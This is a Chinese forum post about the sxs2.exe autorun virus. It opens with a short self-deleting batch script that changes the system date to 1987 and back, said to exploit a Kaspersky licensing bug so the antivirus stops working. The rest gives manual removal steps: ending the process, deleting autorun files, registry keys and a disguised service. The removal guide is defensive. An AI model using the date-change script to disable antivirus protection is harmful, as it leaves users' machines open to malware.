这确实利用了卡巴注册的bug
@echo off
set date=%date%
date 1987-10-18
ping -n 45 localhost > nul
date %date%
del %0
把这个做成.bat运行,卡巴就没用了
当然病毒想发作必须运行像这样的批处理文件或者生成了垃圾服务
1. 先在任务管理器里结束sxs2.exe进程。
2.用WINRAR查看C,D,E,F盘根目录,删除病毒文件。如:autorun开头的病毒文件,sxs2的病毒文件。注意autoexe不要删啊。
3.使用注册表:打开注册表,查找sxs2.exe和sxs2.exe,把项全部删掉。
4.控制面板>>管理工具>>服务>>找到一个是用英文与数字组成的服务名(英文+数字一共是8个数的.....其描述也是用一个8个数来解释的)>>点其属性>>把"自动"的选项改为"禁止"!!!再看上面一行,那里可以看到原文件在C:\WINDOWS\system32\...下的一个8个英文+数字.EXE,打开C:\WINDOWS\system32查找 8个英文+数字.EXE的文件.....删除他.....再清空回收站.....重启计算机,更改时间的病毒应该被清除。
回复Comments
作者:
{commentrecontent}